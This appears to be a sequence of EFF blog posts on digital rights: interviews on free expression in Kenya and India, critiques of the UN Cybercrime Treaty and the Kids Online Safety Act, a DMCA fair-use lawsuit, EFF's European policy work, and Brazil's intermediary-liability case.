I firmly believe that governments must strike a balance between protecting freedom of speech and preventing harm. While everyone has the right to express themselves, that right ends where it begins to infringe on the rights and safety of others. It’s about ensuring that freedom of speech is exercised responsibly to maintain peace and harmony in society.
Greene: So what do we have to be careful about with giving the government the power to regulate speech? You mentioned hate speech can be hard to define. What’s the risk of letting the government define that?
The risk is that the government may overstep its boundaries, as often happens. Another concern is the lack of consistent and standardized enforcement. For instance, someone with influence or connections within the government might escape accountability for their actions, while an activist doing the same thing could face arrest. This disparity in treatment highlights the risks of uneven application of the law and potential misuse of power.
Greene: Earlier you mentioned special concern for access to information. You mentioned children and you mentioned women. Both of those are groups of people where, at least in some places, someone else (not the government, but some other person) might control their access, right? I wonder if you could talk a little bit more about why it’s so important to ensure access to information for those particular groups.
I believe home is the foundational space where access to information and freedom of expression are nurtured. Families play a crucial role in cultivating these values, and it’s important for parents to be intentional about fostering an environment where open communication and access to information are encouraged. Parents have a responsibility to create opportunities for discussion within their households and beyond.
Outside the family, communities provide broader platforms for engagement. In Kenya, for example, public forums known as barazas serve as spaces where community members gather to discuss pressing issues, such as insecurity and public utilities, and to make decisions that impact the neighborhood.
Ensuring that your household is represented in these forums is essential to staying informed and being part of decisions that directly affect you.
It’s equally important to help people understand the power of self-expression and active participation in decision-making spaces. By showing up and speaking out, individuals can contribute to meaningful change. Additionally, exposure to information and critical discussions is vital in today’s world, where misinformation and disinformation are prevalent. Families can address these challenges by having conversations at the dinner table, asking questions like, “Have you heard about this? What’s your understanding of misinformation? How can you avoid being misled online?”
By encouraging open dialogue and critical thinking in everyday interactions, we empower one another to navigate information responsibly and contribute to a more informed and engaged society.
Greene: Now, a question we ask everyone: who is your free speech hero?
I have two. One is a human rights lawyer and former member of Parliament, Gitobu Imanyara. He is one of the few people in Kenya who fought, literally with blood and sweat, for freedom of speech and of the press in this country. He will always be my hero when we talk about press freedom. We are one of the few countries in Africa that enjoy broad freedoms of speech and of the press, and it’s thanks to people like him.
The other is an activist named Boniface Mwangi. He’s a person who never shies away from speaking up. It doesn’t matter who you are or how dangerous it gets, Boni, as he is popularly known, will always be that person who calls out the government when things are going wrong. If you’re driving on the wrong side of the road just because you’re a powerful person in government, he’ll be the person who will not move his car, and he’ll tell you to get back in your lane. I like that. I believe when we speak up we make things happen.
Greene: Anything else you want to add?
I believe it’s time we truly recognize and understand the importance of freedom of expression and speech. Too often, these rights are mentioned casually or taken at face value, without deeper reflection. We need to start interrogating what free speech really means, the tools that enable it, and the ways in which this right can be infringed upon.
As someone passionate about community empowerment, I believe the key lies in educating people about these rights: what it looks like when they are fully exercised and what it means when they are violated, especially in today’s digital age. Only by raising awareness can we empower individuals to embrace these freedoms and advocate for better policies that protect and regulate them effectively. This understanding is essential for fostering informed, engaged communities that can demand accountability and meaningful change.

You should be able to message your family and friends without fear that law enforcement is reading everything you send.
Privacy is a human right, and that’s why we break down the ways you can protect your ability to have a private conversation.
Learn how governments are able to read certain text messages, and how to ensure your messages are end-to-end encrypted, on Digital Rights Bytes, our new site dedicated to breaking down tech issues into byte-sized pieces.
Whether you’re just starting to think about your privacy online or you’re already a regular user of encrypted messaging apps, Digital Rights Bytes is here to help answer some of the common questions that may be bothering you about the devices you use. Watch the short video that explains how to keep your communications private online, and share it with family and friends who may have asked similar questions!
Have you also wondered why it is so expensive to fix your phone, or whether you really own the digital media you paid for? We’ve got answers to those and other questions as well! And if you’ve got additional questions you’d like us to answer in the future, let us know on your social platform of choice using the hashtag #DigitalRightsBytes.

Get a head start on your New Year’s resolution to stay up to date on digital rights news by subscribing to EFF’s EFFector newsletter!
This edition of the newsletter covers our top ten digital security resources for those concerned about the incoming administration, a new bill that could put an end to SLAPP lawsuits, and our recent amicus brief arguing that device searches at the border require a warrant (we’ve been arguing this for a long time).
You can read the full newsletter here, and even get future editions directly to your inbox when you subscribe! Additionally, we’ve got an audio edition of EFFector on the Internet Archive, and you can listen on YouTube: EFFector 36.15 - 10 Resources for Protecting Your Digital Security.
Since 1990 EFF has published EFFector to help keep readers on the bleeding edge of their digital rights. We know that the intersection of technology, civil liberties, human rights, and the law can be complicated, so EFFector is a great way to stay on top of things. The newsletter is chock-full of links to updates, announcements, blog posts, and other stories to help keep readers (and listeners) up to date on the movement to protect online privacy and free expression.
Thank you to the supporters around the world who make our work possible! If you’re not a member yet, join EFF today to help us fight for a brighter digital future.

Most UN Member States, including the U.S., are expected to support adoption of the flawed UN Cybercrime Treaty when it goes before the UN General Assembly for a vote this week, despite warnings that it poses dangerous risks to human rights.
EFF and its civil society partners, along with cybersecurity and internet companies, press organizations, the International Chamber of Commerce, the United Nations High Commissioner for Human Rights, and others, have for years raised red flags that the treaty authorizes open-ended evidence-gathering powers for crimes with little nexus to core cybercrimes, and has minimal safeguards and limitations.
The final draft, unanimously approved in August by over 100 countries that had participated in negotiations, will permit intrusive surveillance practices in the name of engendering cross-border cooperation.
The treaty that will go before the UN General Assembly contains many troubling provisions and omissions that don’t comport with international human rights standards and that leave the implementation of human rights safeguards to the discretion of Member States. Many of these Member States have poor track records on human rights and national laws that don’t protect privacy while criminalizing free speech and gender expression.
Thanks to the work of a coalition of civil society groups that included EFF, the U.S. now seems to recognize this potential danger. In a statement by the U.S. Deputy Representative to the Economic and Social Council, the U.S. said it “shares the legitimate concerns” of industry and civil society, which warned that some states could leverage their human rights-challenged national legal frameworks to enable transnational repression.
We expressed grave concerns that the treaty facilitates requests for user data that will enable cross-border spying and the targeting and harassment of those, for example, who expose and work against government corruption and abuse. Our full analysis of the treaty can be found here.
Nonetheless, the U.S. said it will support the convention when it comes up for this vote, noting among other things that its terms don’t permit parties to use it to violate or suppress human rights.
While that’s true as far as it goes, and is important to include in principle, some Member States’ laws empowered by the treaty already fail to meet human rights standards. And the treaty fails to adopt specific safeguards to truly protect human rights.
The safeguards contained in the convention, such as the need for judicial review in the chapter on procedural measures in criminal investigations, are undermined by being potentially discretionary and contingent on states’ domestic laws. In many countries, these domestic laws don’t require judicial authorization based on reasonable suspicion for surveillance and/or real-time collection of traffic data.
For example, our partner Access Now points out that in Algeria, Lebanon, Palestine, Tunisia, and Egypt, cybercrime laws require telecommunications service providers to preemptively and systematically collect large amounts of user data without judicial authorization.
Meanwhile, Jordan’s cybercrime law has been used against LGBTQ+ people, journalists, human rights defenders, and those criticizing the government.
The U.S. says it is committed to combating human rights abuses by governments that misuse national cybercrime statutes and tools to target journalists and activists. Implementing the treaty, it says, must be paired with robust domestic safeguards and oversight.
It’s hard to imagine that governments will voluntarily revise cybercrime laws as they ratify and implement the treaty; what’s more realistic is that the treaty normalizes such frameworks.
Advocating for improvements during the two-year-long negotiations was a tough slog. And while the final version is highly problematic, civil society achieved some wins. An early negotiating document named 34 purported cybercrime offenses to be included, many of which would have criminalized forms of speech. Civil society warned of the dangers of including speech-related offenses, and the list was dropped in later drafts.
Civil society advocacy also helped secure specific language in the general provision article on human rights specifying that protection of fundamental rights includes freedom of expression, opinion, religion, conscience, and peaceful assembly. Left off the list, though, was gender expression.
The U.S., meanwhile, has called on all states “to take necessary steps within their domestic legal systems to ensure the Convention will not be applied in a manner inconsistent with human rights obligations, including those relating to speech, political dissent, and sexual identity.”
Furthermore, the U.S. government pledges to demand accountability, without saying how it will do so, if states seek to misuse the treaty to suppress human rights. “We will demand accountability for States who try to abuse this Convention to target private companies’ employees, good-faith cybersecurity researchers, journalists, dissidents, and others.” Yet the treaty contains no oversight provisions.
The U.S. said it is unlikely to sign or ratify the treaty “unless and until we see implementation of meaningful human rights and other legal protections by the convention’s signatories.”
We’ll hold the government to its word on this and on its vows to seek accountability. But ultimately, the destiny of the U.S. declarations and the treaty’s impact in the U.S. are more than uncertain under a second Trump administration, as ratification would require both the Senate’s consent and the President’s formal ratification.
Trump withdrew from climate, trade, and arms agreements in his first term, so signing the UN Cybercrime Treaty may not be in the cards: a positive outcome, though probably not one motivated by concerns for human rights.
Meanwhile, we urge states to vote against adoption this week and not to ratify the treaty at home. The document puts global human rights at risk. In a rush to win consensus, negotiators gave Member States lots of leeway to avoid human rights safeguards in their “criminal” investigations, and now millions of people around the world might pay a high price.

This post is part one in a series of posts about EFF’s work in Europe.
EFF’s mission is to ensure that technology supports freedom, justice, and innovation for all people of the world. While our work has taken us to far corners of the globe, in recent years we have worked to expand our efforts in Europe, building up a policy team with key expertise in the region and bringing our experience in advocacy and technology to the European fight for digital rights.
In this blog post series, we will introduce you to the various players involved in that fight, share how we work in Europe, and explain how what happens in Europe can affect digital rights across the globe.
Why EFF Works in Europe
European lawmakers have been highly active in proposing laws to regulate online services and emerging technologies. And these laws have the potential to impact the whole world. As such, we have long recognized the importance of engaging with organizations and lawmakers across Europe. In 2007, EFF became a member of European Digital Rights (EDRi), a collective of NGOs, experts, advocates, and academics that has for two decades worked to advance digital rights throughout Europe.
From the early days of the movement, we fought back against legislation threatening user privacy in Germany, free expression in the UK, and the right to innovation across the continent.
Over the years, we have continued collaborations with EDRi as well as other coalitions including IFEX, the international freedom of expression network, Reclaim Your Face, and Protect Not Surveil. In our EU policy work, we have advocated for fundamental principles like transparency, openness, and informational self-determination. We emphasized that legislative acts should never come at the expense of protections that have served the internet well: Preserve what works. Fix what is broken. And EFF has made a real difference: we have ensured that recent internet regulation bills don’t turn social networks into censorship tools, and we safeguarded users’ right to private conversations. We also helped guide new fairness rules in digital markets to focus on what is really important: breaking the chokehold of major platforms over the internet.
Recognizing the internet’s global reach, we have also stressed that lawmakers must consider the global impact of regulation and enforcement, particularly effects on vulnerable groups and underserved communities. As part of this work, we facilitate a global alliance of civil society organizations representing diverse communities across the world to ensure that non-European voices are heard in Brussels’ policy debates.
Our Teams
Today, we have a robust policy team that works to influence policymakers in Europe. Led by International Policy Director Christoph Schmon and supported by Assistant Director of EU Policy Svea Windwehr, both of whom are based in Europe, the team brings unique expertise in European digital policymaking and fundamental rights online. They engage with lawmakers, provide policy expertise, and coordinate EFF’s work in Europe.
But legislative work is only one piece of the puzzle, and as a collaborative organization, EFF pulls expertise from various teams to shape policy, build capacity, and campaign for a better digital future. Our teams engage with the press and the public through comprehensive analysis of digital rights issues, educational guides, activist workshops, press briefings, and more. They are active in broad coalitions across the EU and the UK, as well as in East and Southeastern Europe.
Our work does not span only EU digital policy issues. We have been active in the UK advocating for user rights in the context of the Online Safety Act, and we also work on issues facing users in the Balkans and in accession countries. For instance, we recently collaborated with Digital Security Lab Ukraine on a workshop on content moderation held in Warsaw, and participated in the Bosnia and Herzegovina Internet Governance Forum. We are also an active member of the High-Level Group of Experts for Resilience Building in Eastern Europe, tasked with advising on online regulation in Georgia, Moldova, and Ukraine.
EFF on Stage
In addition to all of the behind-the-scenes work that we do, EFF regularly takes to European stages to share our mission and message. You can find us at conferences like re:publica, CPDP, Chaos Communication Congress, or Freedom not Fear, and at local events like regional Internet Governance Forums. For instance, last year Director for International Freedom of Expression Jillian C. York gave a talk with Svea Windwehr at Berlin’s re:publica about transparency reporting.
More recently, Senior Speech and Privacy Activist Paige Collings facilitated a session on queer justice in the digital age at a workshop held in Bosnia and Herzegovina.
There is so much more work to be done. In the next posts in this series, you will learn more about what EFF will be doing in Europe in 2025 and beyond, as well as some of our lessons and successes from past struggles.

Interviewer: David Greene
This interview has been edited for length and clarity.
Prasanth Sugathan is Legal Director at Software Freedom Law Center, India (SFLC.in). Prasanth is a lawyer with years of practice in the fields of technology law, intellectual property law, administrative law, and constitutional law. He is an engineer turned lawyer and has worked closely with the Free Software community in India. He has appeared in many landmark cases before various Tribunals, High Courts, and the Supreme Court of India. He has also deposed before Parliamentary Committees on issues related to the Information Technology Act and Net Neutrality.
David Greene: Why don’t you go ahead and introduce yourself.
Sugathan: I am Prasanth Sugathan, I am the Legal Director at the Software Freedom Law Center, India. We are a nonprofit organization based out of New Delhi, started in the year 2010. So we’ve been working at this for 14 years now, working mostly in the area of protecting the rights of citizens in the digital space in India. We do strategic litigation, policy work, trainings, and capacity building. Those are the areas that we work in.
Greene: What was your career path? How did you end up at SFLC?
That’s an interesting story. I am an engineer by training. I had a startup at one point and I did a law degree along with it. I got interested in free software and got into it full time. Because of this involvement with the free software community, the first time I got involved in something related to policy was when there was discussion around software patents, when the patent office came out with a patent manual and there was this discussion about how it could affect the free software community and startups. That was one discussion I followed, I wrote about it, and one thing led to another and I was called to speak at a seminar in New Delhi. That’s where I met Eben and Mishi from the Software Freedom Law Center. That was before SFLC India was started, but once Mishi started the organization I joined as a Counsel. It’s been a long relationship.
Greene: Just in a personal sense, what does freedom of expression mean to you?
Apart from being a fundamental right, as evident in all the human rights agreements we have and in the Indian Constitution, freedom of expression is the most basic aspect of a democratic nation. I mean, without free speech you cannot have a proper exchange of ideas, which is most important for a democracy. For any citizen to speak what they feel, to communicate their ideas, I think that is most important. As of now the internet is a medium which allows you to do that. So there definitely should be minimal restrictions from the government and other agencies on the free exchange of ideas on this medium.
Greene: Have you had any personal experiences with censorship that have informed or influenced how you feel about free expression?
When SFLC.in was started in 2010 our major idea was to support the free software community.
But how we got involved in the debates on free speech and privacy on the internet was when, in 2011, the IT Rules were introduced by the government as a draft for discussion and finally notified. This was on the regulation of intermediaries, these online platforms. This was secondary legislation based on the Information Technology Act (IT Act) in India, which is the parent law. So when these discussions happened we got involved, and then one thing led to another. For example, there was a provision in the IT Act called Section 66-A which criminalized the sending of offensive messages through a computer or other communication devices. It was, ostensibly, introduced to protect women. And the irony was that two women were arrested under this law. That was the first arrest that happened, and it was a case of two women being arrested for comments they made about a leader who had died.
This got us working on trying to talk to parliamentarians, trying to talk to other people about how we could maybe change this law. So there were various instances of content being taken down and people being arrested, and it was always done under Section 66-A of the IT Act. We challenged the IT Rules before the Supreme Court. In a judgment in a 2015 case called Shreya Singhal v. Union of India, the Supreme Court read down the rules relating to intermediary liability. Under the rules, the platforms could be asked to take down content, and they didn’t have much of an option: if they didn’t comply, they would lose their safe harbour protection. The Court said takedowns can be based only on actual knowledge, and what actual knowledge means is someone getting a court order asking them to take down the content, or a direction from the government. These are the only two cases where content can be taken down.
Greene: You’ve lived in India your whole life. Has there ever been a point in your life when you felt your freedom of expression was restricted?
Currently we are going through such a phase, where you’re careful about what you’re speaking about. There is a lot of concern about what is happening in India currently. This is something we can see mostly impacting people who are associated with civil society. When they are voicing their opinions there is now a kind of fear about how the government sees it, whether they will take any action against you for what you say, and how this could affect your organization. Because when you’re affiliated with an organization it’s not just about yourself. You also need to be careful about how anything that you say could affect the organization and your colleagues. We’ve had many instances of nonprofit organizations and journalists being targeted. So there is a kind of chilling effect when you really don’t want to say something you would otherwise say strongly. There is always a toning down of what you want to say.
Greene: Are there any situations where you think it’s appropriate for governments to regulate online speech?
You don’t have an absolute right to free speech under India’s Constitution. There can be restrictions, as stated under Article 19(2) of the Constitution. There can be reasonable restrictions by the government, for instance, for something that could lead to violence or a riot between communities.
So mostly if you look at hate speech on the net which could lead to a violent situation or riots between communities, that could be a case where maybe the government could intervene. And I would even say those are cases where platforms should intervene. We have seen a lot of hate speech on the net during India’s current elections, as there have been different phases of elections going on for close to two months. We have seen that happening with not just political leaders but with many supporters of political parties publishing content on various platforms which isn’t exactly hate speech but which could potentially create situations where you have at least two communities fighting each other. It’s definitely not a desirable situation. Those are the cases where maybe platforms themselves could regulate, or maybe the government needs to regulate. In this case, for example, when it is related to elections, the Election Commission also has its role, but in many cases we don’t see that happening.
Greene: Okay, let’s go back to hate speech for a minute because that’s always been a very difficult problem. Is that a difficult problem in India? Is hate speech well-defined? Do you think the current rules serve society well or are there problems with it?
I wouldn’t say it’s well-defined, but even in the current law there are provisions that address it. So anything which could lead to violence or which could lead to animosity between two communities will fall in the realm of hate speech. It’s not defined as such, but that is where your free speech rights could be restricted. That definitely could fall under the definition of hate speech.
Greene: And do you think that definition works well?
I mean, the definition is not the problem. It’s essentially a question of how it is implemented. It’s a question of how the government or its agencies implement it. It’s a question of how platforms are taking care of it. Those are two issues where there’s more that needs to be done.
Greene: You also talked about misinformation in terms of elections. How do we reconcile freedom of expression concerns with concerns for preventing misinformation?
I would definitely say it’s a gray area. I mean, how do you really balance this? But I don’t think it’s a problem which cannot be addressed. Definitely there’s a lot for civil society to do, a lot for the private sector to do. Especially, for example, when hate speech is reported to the platforms, it should be dealt with quickly, but that is where we’re seeing the stark difference between how platforms act on such reporting in the Global North and what happens in the Global South. Platforms need to up their act when it comes to handling such situations and handling such content.
Greene: Okay, let’s talk about the platforms then. How do you feel about censorship or restrictions on freedom of expression by the platforms?
Things have changed a lot as to how these platforms work. Now the platforms decide what kind of content gets to your feed and how the algorithms work to promote content which is more viral. In many cases we have seen how misinformation and hate speech go viral. And the content that debunks the misinformation, the content providing the real facts, doesn’t go as far; it doesn’t go viral or come up in your feed that fast.
So that definitely is a problem, the way platforms are dealing with it. In many cases it might be economically beneficial for them to make sure that viral content which puts forth misinformation reaches more eyes.

Greene: Do you think that the platforms that are most commonly used in India—and I know there's no TikTok in India—serve free speech interests or not?

When the Information Technology Rules were introduced and those discussions happened, I would say civil society supported the platforms, essentially saying these platforms ensured people could enjoy their free speech rights and express themselves freely. How the situation changed over time is interesting. These platforms are definitely still important for us to exercise these rights. But when it comes to content being regulated, some platforms do push back when the government asks them to take down content, but we have not seen that much. So whether they're really the messiahs of free speech, I doubt. Over the years, we have seen that when the government tells them to do something, it is most often in their interest to do what the government says. There has not been much pushback, except for maybe Twitter challenging it in court. There have not been many instances where these platforms supported users.

Greene: So we've talked about hate speech and misinformation. Are there other types of content or categories of online speech that are either problematic in India now, or at least that regulators are looking at, that you think the government might try to do something about?

One major concern the government is trying to regulate is deepfakes, with even the Prime Minister speaking about it. So suddenly that is a priority for the government to regulate. It's definitely a problem, especially for public figures, and particularly for women in politics, who often have their images manipulated. In India we see that at election time. Even politicians who have been in the field for a long time have had their images misused and morphed images circulated. That's definitely something the platforms need to act on. For example, you cannot have the luxury of taking, let's say, 48 hours to decide what to do when something like that is posted. This is something platforms have to deal with as early as possible. We do understand there's a lot of content and a lot of reporting happening, but in some cases at least there should be some prioritization: reports related to non-consensual sexual imagery should move up the queue.

Greene: As an engineer, how do you feel about deepfake tech? Should the regulatory concerns be qualitatively different than for other kinds of false information?

When it comes to deepfakes, I would say the problem is that they have become more mainstream. It has become very easy for a person to use these tools, which have become far more accessible. Earlier you needed specialized knowledge, especially when it came to something like editing videos. Now it's much easier, and these tools are made easily available. The major difference now is how easy it is to access these applications. There cannot be a case of fully regulating or fully controlling a technology.
It's not essentially a problem with the technology, because there are a lot of ethical use cases. Just because something is used for a harmful purpose doesn't mean you completely block the technology. There is definitely a case for regulating AI and regulating deepfakes, but that doesn't mean you put a complete stop to it.

Greene: How do you feel about TikTok being banned in India?

I think that's less a question of technology or regulation and more of a geopolitical issue. I don't think it has anything to do with the technology, or even the transfer of data for that matter. I think it was just a geopolitical issue related to India/China relations. The relations soured with the border disputes and other things, and I think that was the trigger for the TikTok ban.

Greene: What is your most significant legal victory from a human rights perspective, and why?

The victory we had in the fight against the 2011 Rules, the portions related to intermediary liability, which were struck down by the Supreme Court. That was important because, when it came to platforms and to people expressing critical views online, all of this content could have been taken down very easily. It was a case of free speech rights being affected without much recourse. So that was a major victory.

Greene: Okay, now we ask everyone this question. Who is your free speech hero and why?

I can't think of one person, but I think of, for example, when the country went through a bleak period in the 1970s and the government declared a national state of emergency. During that time we had journalists and politicians who fought for free speech rights with respect to the news media. At that time even writing something in a publication was difficult. We had many cases of journalists who fought this, people who went to jail for writing something, for opposing the government or publicly criticizing it. So I don't think of just one person; we saw journalists and political leaders fighting back during that state of emergency. Those are the heroes who could fight the government and law enforcement. Then there was the case of Justice H.R. Khanna, a judge who stood up for citizens' rights and gave his dissenting opinion against the majority view, which cost him the position of Chief Justice. Maybe I would say he's a hero, a person who was clear about constitutional values and principles.

No one gets to abuse copyright to shut down debate. That's why we at EFF represent Channel 781, a group of citizen journalists whose YouTube channel was temporarily shut down following copyright infringement claims made by Waltham Community Access Corporation (WCAC). As part of that case, the federal court in Massachusetts heard oral arguments in Channel 781 News v. Waltham Community Access Corporation, a pivotal case for copyright law and digital journalism.

WCAC, Waltham's public access channel, records city council meetings on video. Channel 781, a group of independent journalists, curates clips of those meetings for its YouTube channel, along with original programming, to spark debate on issues like housing policy and real estate development.
WCAC sent a series of DMCA takedown notices accusing Channel 781 of copyright infringement, and as a result YouTube deactivated Channel 781's channel just days before a critical municipal election.

Represented by EFF and the law firm Brown Rudnick LLP, Channel 781 sued WCAC for misrepresentations in its DMCA takedown notices. We argued that using clips of government meetings from the government access station to engage in public debate is an obvious fair use under copyright law. Also, by excerpting factual recordings and using captions to improve accessibility, the group aims to educate the public, a purpose distinct from WCAC's unannotated broadcasts of hours-long meetings. The lawsuit alleges that WCAC's takedown requests knowingly misrepresented the legality of Channel 781's use, violating Section 512(f) of the DMCA.

Fighting a Motion to Dismiss

In court this week, EFF pushed back against WCAC's motion to dismiss the case. We argued to District Judge Patti Saris that Channel 781's use of video clips of city government meetings was an obvious fair use, and that by failing to consider fair use before sending takedown notices to YouTube, WCAC violated the law and should be liable for damages.

If Judge Saris denies WCAC's motion, we will move on to proving our case. We're confident that the outcome will promote accountability for copyright holders who misuse the powerful notice-and-takedown mechanism that the DMCA provides, and also protect citizen journalists in their use of digital tools.

EFF will continue to provide updates as the case develops. Stay tuned for the latest news on this critical fight for free expression and the protection of digital rights.

Late last week, the Senate released yet another version of the Kids Online Safety Act, written, reportedly, with the assistance of X CEO Linda Yaccarino in a flawed attempt to address the critical free speech issues inherent in the bill. This last-minute draft remains, at its core, an unconstitutional censorship bill that threatens the online speech and privacy rights of all internet users.

TELL CONGRESS: VOTE NO ON KOSA

Update Fails to Protect Users from Censorship or Platforms from Liability

The most important update, according to its authors, supposedly minimizes the impact of the bill on free speech. As we've said before, KOSA's "duty of care" section is its biggest problem, as it would force a broad swath of online services to make policy changes based on the content of online speech. Though the bill's authors inaccurately claim KOSA only regulates designs of platforms, not speech, the list of harms it enumerates—eating disorders, substance use disorders, and suicidal behaviors, for example—are not caused by the design of a platform.

KOSA is likely to actually increase the risks to children, because it will prevent them from accessing online resources about topics like addiction, eating disorders, and bullying. It will result in services imposing age verification requirements and content restrictions, and it will stifle minors from finding or accessing their own supportive communities online.
For these reasons, we've been critical of KOSA since it was introduced in 2022.

This updated bill adds just one sentence to the "duty of care" requirement: "Nothing in this section shall be construed to allow a government entity to enforce subsection a [the duty of care] based upon the viewpoint of users expressed by or through any speech, expression, or information protected by the First Amendment to the Constitution of the United States." But the viewpoint of users was never impacted by KOSA's duty of care in the first place. The duty of care is a duty imposed on platforms, not users. Platforms must mitigate the harms listed in the bill, not users, and it is the platform's ability to share users' views that is at risk—not the ability of users to express those views. Adding that the bill doesn't impose liability based on user expression doesn't change how the bill would be interpreted or enforced. The FTC could still hold a platform liable for the speech it contains.

Let's say, for example, that a covered platform like Reddit hosts a forum created and maintained by users for discussion of overcoming eating disorders. Even though the speech contained in that forum is entirely legal, often helpful, and possibly even life-saving, the FTC could still hold Reddit liable for violating the duty of care by allowing young people to view it. The same could be true of a Facebook group about LGBTQ issues, or of a post about drug use that X showed a user through its algorithm. If a platform's defense were that this information is protected expression, the FTC could simply say that it isn't enforcing the law based on the expression of any individual viewpoint, but based on the fact that the platform allowed a design feature—a subreddit, Facebook group, or algorithm—to distribute that expression to minors. It's a superfluous carveout for user speech and expression that KOSA never penalized in the first place, but which a platform would still be penalized for distributing.

It's particularly disappointing that those in charge of X—likely a covered platform under the law—had any role in writing this language, as the authors have failed to grasp the world of difference between immunizing individual expression and protecting their own platform from the liability that KOSA would place on it.

Compulsive Usage Doesn't Narrow KOSA's Scope

Another of KOSA's problems has been its vague list of harms, which has remained broad enough that platforms have no clear guidance on what is likely to cross the line. This update requires that the harms of "depressive disorders and anxiety disorders" have "objectively verifiable and clinically diagnosable symptoms that are related to compulsive usage." The latest text's definition of compulsive usage, however, is equally vague: "a persistent and repetitive use of a covered platform that significantly impacts one or more major life activities, including socializing, sleeping, eating, learning, reading, concentrating, communicating, or working." This doesn't narrow the scope of the bill.

It should be noted that there is no clinical definition of "compulsive usage" of online services.
As in past versions of KOSA, this update cobbles together a definition that sounds just medical, or just legal, enough to appear legitimate—when in fact the definition is devoid of specific legal meaning, and dangerously vague to boot.

How could the persistent use of social media not significantly impact the way someone socializes or communicates? The bill doesn't even require that the impact be a negative one. Comments on an Instagram photo from a potential partner may make it hard to sleep for several nights in a row; a lengthy new YouTube video may impact someone's workday. Opening a Snapchat account might significantly impact how a teenager keeps in touch with her friends, but that doesn't mean her preference for it over text messages is "compulsive" and therefore necessarily harmful.

Nonetheless, an FTC weaponizing KOSA could still hold platforms liable for showing content to minors that it believes results in depression or anxiety, so long as it can claim the anxiety or depression disrupted someone's sleep, or even just changed how someone socializes or communicates. These so-called "harms" could still encompass a huge swathe of entirely legal (and helpful) content about everything from abortion access and gender-affirming care to drug use, school shootings, and tackle football.

Dangerous Censorship Bills Do Not Belong in Must-Pass Legislation

The latest KOSA draft comes as the incoming nominee for FTC Chair, Andrew Ferguson—who would be empowered to enforce the law, if passed—has reportedly vowed to protect free speech by "fighting back against the trans agenda," among other things. As we've said for years (and about every version of the bill), KOSA would give the FTC under this or any future administration wide berth to decide what sort of content platforms must prevent young people from seeing. Just passing KOSA would likely result in platforms taking down protected speech and implementing age verification requirements, even if it's never enforced; the FTC could simply announce the types of content it believes harm children and use the mere threat of enforcement to force platforms to comply.

No representative should consider shoehorning this controversial and unconstitutional bill into a continuing resolution. A law that forces platforms to censor truthful online content should not be in a last-minute funding bill.

TELL CONGRESS: VOTE NO ON KOSA

The Brazilian Supreme Court is on the verge of deciding whether digital platforms can be held liable for third-party content even without a judicial order requiring removal. A panel of eleven justices is examining two cases jointly, and one of them directly challenges whether Brazil's internet intermediary liability regime for user-generated content aligns with the country's Federal Constitution or fails to meet constitutional standards. The outcome of these cases could seriously undermine important free expression and privacy safeguards if it leads to general content monitoring obligations or broadly expands notice-and-takedown mandates.

The court's examination revolves around Article 19 of Brazil's Civil Rights Framework for the Internet ("Marco Civil da Internet", Law n. 12.965/2014).
The provision establishes that an internet application provider can be held liable for third-party content only if it fails to comply with a judicial order to remove the content. A notice-and-takedown exception applies in cases of copyright infringement, unauthorized disclosure of private images containing nudity or sexual activity, and content involving child sexual abuse. The first two exceptions are in Marco Civil itself, while the third comes from a prior rule in the Brazilian child protection law.

The court's decision will set a precedent for lower courts on two main topics: whether Marco Civil's internet intermediary liability regime is aligned with Brazil's Constitution, and whether internet application providers have an obligation to monitor the online content they host and remove it when deemed offensive, without judicial intervention. Moreover, it can have a regional and cross-regional impact as lawmakers and courts look across borders at platform regulation trends amid global coordination initiatives.

After a public hearing held last year, the court's sessions on the cases started in late November and, so far, only Justice Dias Toffoli, who is in charge of Marco Civil's constitutionality case, has concluded the presentation of his vote. The justice declared Article 19 unconstitutional and established the notice-and-takedown regime set out in Article 21 of Marco Civil, which relates to unauthorized disclosure of private images, as the general rule for intermediary liability. According to his vote, the determination of liability must consider the activities the internet application provider has actually carried out and the degree of interference of those activities.

However, platforms could be held liable for certain content regardless of notification, leading to a monitoring duty. Examples include content considered a criminal offense, such as crimes against the democratic state, human trafficking, terrorism, racism, and violence against children and women. It also includes the publication of notoriously false or severely miscontextualized facts that lead to violence or have the potential to disrupt the electoral process. If there's reasonable doubt, the notice-and-takedown rule under Marco Civil's Article 21 would be the applicable regime.

The court session resumes today, but it's still uncertain whether all eleven justices will reach a judgment by year's end.

Some Background About Marco Civil's Intermediary Liability Regime

The legislative intent back in 2014 to establish Article 19 as the general rule for internet application providers' liability for user-generated content reflected civil society's concerns over platform censorship. Faced with the risk of being held liable for user content, internet platforms generally prioritize their economic interests and legal security over preserving users' protected expression, and they over-remove content to avoid legal battles and regulatory scrutiny. The enforcement overreach of copyright rules online was already a problem when the legislative discussion of Marco Civil took place. Lawmakers chose to rely on courts to balance the different rights at stake in removing or keeping user content online. The approval of Marco Civil had wide societal support and was considered a win for advancing users' rights online.
The provision was in line with the standards advanced by the Special Rapporteurs for Freedom of Expression of the United Nations and the Inter-American Commission on Human Rights (IACHR). In that regard, the then IACHR Special Rapporteur had clearly remarked that a strict liability regime creates strong incentives for private censorship and would run against the State's duty to favor an institutional framework that protects and guarantees free expression under the American Convention on Human Rights. Notice-and-takedown regimes as the general rule also raised concerns about over-removal and the weaponization of notification mechanisms to censor protected speech.

A lot has happened since 2014. Big Tech platforms have consolidated their dominance, the internet ecosystem is more centralized, and algorithmic mediation of content distribution online has intensified, increasingly relying on a corporate surveillance structure. Nonetheless, the concerns Marco Civil reflects remain relevant, just as the balance its intermediary liability rule struck persists as a proper way of tackling those concerns. As for current challenges, the changes to the liability regime suggested in Dias Toffoli's vote will likely reinforce rather than reduce corporate surveillance, Big Tech's predominance, and digital platforms' power over online speech.

The Cases Under Trial and The Reach of the Supreme Court's Decision

The two individual cases under analysis by the Supreme Court are more than a decade old. Both relate to the right to honor. In the first, the plaintiff, a high school teacher, sued Google Brasil Internet Ltda to remove an online community created by students to offend her on the now-defunct Orkut platform. She asked for the deletion of the community and compensation for moral damages, as the platform didn't remove the community after an extrajudicial notification. Google deleted the community following the decision of the lower court, but the judicial dispute over the compensation continued.

In the second case, the plaintiff sued Facebook after the company didn't remove an offensive fake account impersonating her. The lawsuit sought to shut down the fake account, obtain the identification of the account's IP address, and secure compensation for moral damages. As Marco Civil had already passed, the judge denied the moral compensation request. Yet the appeals court found that Facebook could be liable for not removing the fake account after an extrajudicial notification, finding Marco Civil's intermediary liability regime unconstitutional vis-à-vis Brazil's constitutional protection of consumers.

